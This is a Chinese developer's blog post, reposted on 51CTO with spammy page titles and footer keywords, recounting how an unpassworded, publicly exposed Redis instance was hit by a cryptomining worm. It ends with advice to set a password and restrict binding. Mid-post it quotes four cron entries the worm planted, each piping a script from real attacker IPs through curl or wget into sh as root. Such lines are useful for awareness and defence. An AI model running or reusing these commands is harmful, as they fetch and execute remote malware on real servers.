成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

事實證明,互聯(lián)網(wǎng)會懲罰每一個裸奔的人之 Redis 擴散病毒

安全 應(yīng)用安全
查了下發(fā)現(xiàn)這是一種 Redis 擴散病毒,專門利用 Redis 未授權(quán)訪問漏洞的挖礦病毒。沒錯,就是 Redis 沒設(shè)置密碼,沒授權(quán),讓病毒有了可乘之機。

前段時間換了臺電腦,一大堆開發(fā)環(huán)境我實在是懶得在本地搞了,每次啟動來啟動去太麻煩了,索性直接在服務(wù)器上開 Docker 部署,docker pull 復(fù)制粘貼什么 Redis、什么 MySQL 分分鐘裝好,要用的時候直接遠程連接就行了,簡直不要太方便。

也不是什么業(yè)務(wù)場景讓我發(fā)現(xiàn)了這么一個病毒,因為大部分 Redis Key 都是設(shè)置了過期時間的,開發(fā)過程也沒感覺到什么問題,純粹是有一天我閑著沒事干,進入 Redis 命令行 keys * 看看,不看不要緊,一看好家伙,多出了幾個 key,大概就是下面這樣子:

uid:1
uid:2
uid:3
backup1
backup2
backup3
backup4

多出了 4 個 backup 前綴的 key,我第一反應(yīng)這肯定是什么備份文件

正常情況下我根本不會在意,純粹就是那天確實比較閑,不如來學(xué)習(xí)下 Redis 吧(哈哈),于是,稟著好學(xué)的基本素養(yǎng),我分別查看了下這里面的 value 是什么:

*/2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh

*/3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh

*/4 * * * * root curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh

*/5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh

wget 是用來下載東西的,curl 是用于執(zhí)行 HTTP 請求,點開 http://45.83.123.29/cleanfda/init.sh 看看到底是什么腳本文件:

圖片

又是改權(quán)限,又是關(guān)防火墻刪文件的,用屁股想都知道這 IP 肯定是國外的了:

圖片

查了下發(fā)現(xiàn)這是一種 Redis 擴散病毒,專門利用 Redis 未授權(quán)訪問漏洞的挖礦病毒。沒錯,就是 Redis 沒設(shè)置密碼,沒授權(quán),讓病毒有了可乘之機。如果服務(wù)暴露在互聯(lián)網(wǎng)上就一定要設(shè)置密碼,不要裸奔 ??,很多同學(xué)大部分時間都是在本地開發(fā),沒有設(shè)置密碼的習(xí)慣或者只是簡單的設(shè)置成 root 這種

另外,除了設(shè)置密碼,服務(wù)器開放端口的時候最好也指定下 IP,不然默認的 0.0.0.0:6379 任何 IP 都可以訪問

責(zé)任編輯:武曉燕 來源: 飛天小牛肉
相關(guān)推薦

2014-01-09 09:34:07

Linux

2021-11-24 07:25:47

ESClickHouse存儲

2022-05-17 23:44:25

大數(shù)據(jù)工具樣本分析師

2021-08-23 07:42:57

Windows 10操作系統(tǒng)微軟

2017-12-27 14:15:47

大數(shù)據(jù)數(shù)據(jù)分析圣誕

2024-06-04 14:08:00

2022-03-15 14:53:30

安全隱私信息泄露

2014-06-12 08:58:13

阿里巴巴王堅云計算

2019-05-25 11:19:03

華為開發(fā)者存儲

2013-01-30 09:16:39

云標準云服務(wù)

2013-03-04 16:45:49

2020-10-23 10:12:30

物聯(lián)網(wǎng)互聯(lián)網(wǎng)技術(shù)

2016-10-11 13:44:23

實時通信互聯(lián)網(wǎng)

2013-07-29 09:53:57

醫(yī)療馬云阿里

2010-09-10 14:14:55

群發(fā)郵件蠕蟲病毒

2015-06-24 15:35:54

2011-08-19 11:33:32

2011-04-01 16:59:20

2009-03-24 09:44:29

互聯(lián)網(wǎng)抄襲馬化騰

2020-03-03 15:45:08

互聯(lián)網(wǎng)求職行業(yè)從業(yè)者
點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 国产精品精品久久久 | 精品国产一级 | www.亚洲| 奇米视频777 | 国产福利在线视频 | 久久亚洲国产精品 | 精品国产91乱码一区二区三区 | 成人影院av | 成人日韩| 精品麻豆剧传媒av国产九九九 | 欧美性区| 免费成人在线网 | 国产99精品| 久久久久综合 | 黄色免费网址大全 | 毛片在线看片 | 中文av网站 | 成人av在线播放 | 丝袜美腿一区二区三区动态图 | 美女张开腿露出尿口 | 综合国产 | 久久久久国产一区二区三区不卡 | 精品一二三区视频 | 日本91av视频| 中国一级特黄毛片大片 | 亚洲三区在线观看 | 91精品国产高清久久久久久久久 | 黄色片av| 午夜私人影院在线观看 | av资源中文在线天堂 | 中文在线亚洲 | 日韩另类 | 夜夜骚视频 | 欧美一区精品 | 一区二区日韩 | 亚洲国产成人精品久久 | 一区中文字幕 | 欧美国产一区二区 | 国产一区二区三区四区三区四 | 噜噜噜噜狠狠狠7777视频 | 中文字幕在线观看视频网站 |